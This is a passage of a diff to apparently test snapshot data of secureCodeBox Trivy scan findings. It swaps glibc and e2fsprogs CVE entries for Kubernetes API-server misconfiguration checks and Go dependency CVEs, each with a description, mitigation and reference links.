Type: 'kubernetes'", + "id": "KCV0019", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "http://www.securityfocus.com/bid/109167", - "https://access.redhat.com/security/cve/CVE-2019-1010023", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", - "https://security-tracker.debian.org/tracker/CVE-2019-1010023", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", - "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010023", - "https://www.cve.org/CVERecord?id=CVE-2019-1010023", + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0019", ], }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Re-mapping current loaded library with malicious ELF file. The impact is: In worst case attacker may evaluate privileges. The component is: libld. The attack vector is: Attacker sends 2 ELF files to victim and asks to run ldd on it. ldd execute code. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "glibc: running ldd on malicious ELF leads to code execution because of wrong size computation", + "category": "Misconfiguration", + "description": "Enable auditing on the Kubernetes API Server and set the desired audit log path.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml on the Control Plane node and set the --audit-log-path parameter.", + "name": "Ensure that the --audit-log-path argument is set(Ensure that the --audit-log-path argument is set)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010023", - }, - { - "type": "URL", - "value": "http://www.securityfocus.com/bid/109167", + "value": "https://avd.aquasec.com/misconfig/kcv0019", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010023", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0020", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0020", + ], + }, + "category": "Misconfiguration", + "description": "Retain the logs for at least 30 days or as appropriate.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml on the Control Plane node and set the --audit-log-maxage parameter to 30 or as an appropriate number of days.", + "name": "Ensure that the --audit-log-maxage argument is set to 30 or as appropriate(Ensure that the --audit-log-maxage argument is set to 30 or as appropriate)", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", + "value": "https://avd.aquasec.com/misconfig/kcv0020", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010023", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0021", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0021", + ], + }, + "category": "Misconfiguration", + "description": "Retain 10 or an appropriate number of old log files.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml on the Control Plane node and set the --audit-log-maxbackup parameter to 10 or to an appropriate value.", + "name": "Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate(Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate)", + "references": [ { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", + "value": "https://avd.aquasec.com/misconfig/kcv0021", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0022", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0022", + ], + }, + "category": "Misconfiguration", + "description": "Rotate log files on reaching 100 MB or as appropriate.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml on the Control Plane node and set the --audit-log-maxsize parameter to an appropriate size in MB", + "name": "Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate(Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate)", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010023", + "value": "https://avd.aquasec.com/misconfig/kcv0022", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010023", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, ], "severity": "LOW", @@ -57411,130 +57338,289 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010024", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV001", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "http://www.securityfocus.com/bid/109162", - "https://access.redhat.com/security/cve/CVE-2019-1010024", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", - "https://security-tracker.debian.org/tracker/CVE-2019-1010024", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", - "https://support.f5.com/csp/article/K06046097", - "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010024", - "https://www.cve.org/CVERecord?id=CVE-2019-1010024", + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv001", ], }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass ASLR using cache of thread stack and heap. The component is: glibc. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "glibc: ASLR bypass using cache of thread stack and heap", + "category": "Misconfiguration", + "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", + "name": "Process can elevate its own privileges(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'securityContext.allowPrivilegeEscalation' to false)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010024", + "value": "https://avd.aquasec.com/misconfig/ksv001", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/109162", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV003", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", + "https://avd.aquasec.com/misconfig/ksv003", + ], + }, + "category": "Misconfiguration", + "description": "The container should drop all default capabilities and add only those that are needed for its execution.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", + "name": "Default capabilities not dropped(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should add 'ALL' to 'securityContext.capabilities.drop')", + "references": [ { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010024", + "value": "https://avd.aquasec.com/misconfig/ksv003", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", + "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV009", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "https://avd.aquasec.com/misconfig/ksv009", + ], + }, + "category": "Misconfiguration", + "description": "Sharing the host’s network namespace permits processes in the pod to communicate with processes bound to the host’s loopback adapter.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Do not set 'spec.template.spec.hostNetwork' to true.", + "name": "Access to host network(Pod 'kube-apiserver-kind-control-plane' should not set 'spec.template.spec.hostNetwork' to true)", + "references": [ { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010024", + "value": "https://avd.aquasec.com/misconfig/ksv009", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV011", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "https://avd.aquasec.com/misconfig/ksv011", + ], + }, + "category": "Misconfiguration", + "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", + "name": "CPU not limited(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'resources.limits.cpu')", + "references": [ { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097", + "value": "https://avd.aquasec.com/misconfig/ksv011", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV012", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv012", + ], + }, + "category": "Misconfiguration", + "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", + "name": "Runs as root user(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'securityContext.runAsNonRoot' to true)", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010024", + "value": "https://avd.aquasec.com/misconfig/ksv012", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010024", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010025", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV014", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "https://access.redhat.com/security/cve/CVE-2019-1010025", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", - "https://security-tracker.debian.org/tracker/CVE-2019-1010025", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", - "https://support.f5.com/csp/article/K06046097", - "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010025", - "https://www.cve.org/CVERecord?id=CVE-2019-1010025", + "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "https://avd.aquasec.com/misconfig/ksv014", ], }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may guess the heap addresses of pthread_created thread. The component is: glibc. NOTE: the vendor's position is "ASLR bypass itself is not a vulnerability."", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "glibc: information disclosure of heap addresses of pthread_created thread", + "category": "Misconfiguration", + "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", + "name": "Root file system is not read-only(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'securityContext.readOnlyRootFilesystem' to true)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010025", + "value": "https://avd.aquasec.com/misconfig/ksv014", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010025", + "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV016", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-resources-limits-memory/", + "https://avd.aquasec.com/misconfig/ksv016", + ], + }, + "category": "Misconfiguration", + "description": "When containers have memory requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Set 'containers[].resources.requests.memory'.", + "name": "Memory requests not specified(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'resources.requests.memory')", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", + "value": "https://avd.aquasec.com/misconfig/ksv016", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010025", + "value": "https://kubesec.io/basics/containers-resources-limits-memory/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV018", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-resources-limits-memory/", + "https://avd.aquasec.com/misconfig/ksv018", + ], + }, + "category": "Misconfiguration", + "description": "Enforcing memory limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", + "name": "Memory not limited(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'resources.limits.memory')", + "references": [ { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", + "value": "https://avd.aquasec.com/misconfig/ksv018", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097", + "value": "https://kubesec.io/basics/containers-resources-limits-memory/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV020", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv020", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", + "name": "Runs with low user ID(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'securityContext.runAsUser' > 10000)", + "references": [ { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "value": "https://avd.aquasec.com/misconfig/ksv020", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010025", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV021", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv021", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", + "name": "Runs with low group ID(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'securityContext.runAsGroup' > 10000)", + "references": [ { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010025", + "value": "https://avd.aquasec.com/misconfig/ksv021", + }, + { + "type": "URL", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, ], "severity": "LOW", @@ -57542,1643 +57628,1718 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-9192", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV023", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "https://access.redhat.com/security/cve/CVE-2019-9192", - "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", - "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", - "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", - "https://www.cve.org/CVERecord?id=CVE-2019-9192", + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "https://avd.aquasec.com/misconfig/ksv023", ], }, - "category": "Vulnerability", - "description": "** DISPUTED ** In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(|)(\\\\1\\\\1)*' in grep, a different issue than CVE-2018-20796. NOTE: the software maintainer disputes that this is a vulnerability because the behavior occurs only with a crafted pattern.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", + "category": "Misconfiguration", + "description": "HostPath volumes must be forbidden.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Do not set 'spec.volumes[*].hostPath'.", + "name": "hostPath volumes mounted(Pod 'kube-apiserver-kind-control-plane' should not set 'spec.template.volumes.hostPath')", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-9192", + "value": "https://avd.aquasec.com/misconfig/ksv023", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-9192", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV030", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv030", + ], + }, + "category": "Misconfiguration", + "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", + "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", + "value": "https://avd.aquasec.com/misconfig/ksv030", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV106", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv106", + ], + }, + "category": "Misconfiguration", + "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", + "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", + "references": [ { "type": "URL", - "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "value": "https://avd.aquasec.com/misconfig/ksv106", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-9192", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-1304", - "installedVersion": "1.46.2-2", - "packageName": "libcom-err2", + "fixedVersion": "2.8.2-beta.1", + "foundIn": "Target: 'dashboard' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2023-2253", + "installedVersion": "v2.8.1+incompatible", + "packageName": "github.com/docker/distribution", "references": [ - "https://access.redhat.com/errata/RHSA-2022:8361", - "https://access.redhat.com/security/cve/CVE-2022-1304", - "https://bugzilla.redhat.com/2069726", - "https://bugzilla.redhat.com/show_bug.cgi?id=2069726", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1304", - "https://errata.almalinux.org/9/ALSA-2022-8361.html", - "https://errata.rockylinux.org/RLSA-2022:8361", - "https://linux.oracle.com/cve/CVE-2022-1304.html", - "https://linux.oracle.com/errata/ELSA-2022-8361.html", - "https://marc.info/?l=linux-ext4&m=165056234501732&w=2", - "https://nvd.nist.gov/vuln/detail/CVE-2022-1304", - "https://ubuntu.com/security/notices/USN-5464-1", - "https://www.cve.org/CVERecord?id=CVE-2022-1304", + "https://access.redhat.com/security/cve/CVE-2023-2253", + "https://bugzilla.redhat.com/show_bug.cgi?id=2189886", + "https://github.com/advisories/GHSA-hqxw-f8mx-cpmw", + "https://github.com/distribution/distribution/commit/f55a6552b006a381d9167e328808565dd2bf77dc", + "https://github.com/distribution/distribution/security/advisories/GHSA-hqxw-f8mx-cpmw", + "https://nvd.nist.gov/vuln/detail/CVE-2023-2253", + "https://www.cve.org/CVERecord?id=CVE-2023-2253", ], }, "category": "Vulnerability", - "description": "An out-of-bounds read/write vulnerability was found in e2fsprogs 1.46.5. This issue leads to a segmentation fault and possibly arbitrary code execution via a specially crafted filesystem.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "description": "A flaw was found in the \`/v2/_catalog\` endpoint in distribution/distribution, which accepts a parameter to control the maximum number of records returned (query string: \`n\`). This vulnerability allows a malicious user to submit an unreasonably large value for \`n,\` causing the allocation of a massive string array, possibly causing a denial of service through excessive use of memory.", + "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=kubernetes-dashboard", "mitigation": undefined, - "name": "e2fsprogs: out-of-bounds read/write via crafted filesystem", + "name": "DoS from malicious API request", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-1304", + "value": "https://avd.aquasec.com/nvd/cve-2023-2253", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8361", + "value": "https://access.redhat.com/security/cve/CVE-2023-2253", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-1304", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2189886", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2069726", + "value": "https://github.com/advisories/GHSA-hqxw-f8mx-cpmw", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2069726", + "value": "https://github.com/distribution/distribution/commit/f55a6552b006a381d9167e328808565dd2bf77dc", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1304", + "value": "https://github.com/distribution/distribution/security/advisories/GHSA-hqxw-f8mx-cpmw", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8361.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-2253", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8361", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-2253", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "0.0.0-20220906165146-f3363e06e74c", + "foundIn": "Target: 'dashboard' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-27664", + "installedVersion": "v0.0.0-20220722155237-a158d28d115b", + "packageName": "golang.org/x/net", + "references": [ + "https://access.redhat.com/errata/RHSA-2023:2357", + "https://access.redhat.com/security/cve/CVE-2022-27664", + "https://bugzilla.redhat.com/2107371", + "https://bugzilla.redhat.com/2107374", + "https://bugzilla.redhat.com/2107383", + "https://bugzilla.redhat.com/2107386", + "https://bugzilla.redhat.com/2107388", + "https://bugzilla.redhat.com/2113814", + "https://bugzilla.redhat.com/2124669", + "https://bugzilla.redhat.com/2132868", + "https://bugzilla.redhat.com/2132872", + "https://bugzilla.redhat.com/2161274", + "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", + "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", + "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", + "https://errata.almalinux.org/9/ALSA-2023-2357.html", + "https://errata.rockylinux.org/RLSA-2022:7129", + "https://github.com/advisories/GHSA-69cg-p879-7622", + "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", + "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", + "https://github.com/golang/go/issues/54658", + "https://go.dev/cl/428735", + "https://go.dev/issue/54658", + "https://groups.google.com/g/golang-announce", + "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", + "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", + "https://linux.oracle.com/cve/CVE-2022-27664.html", + 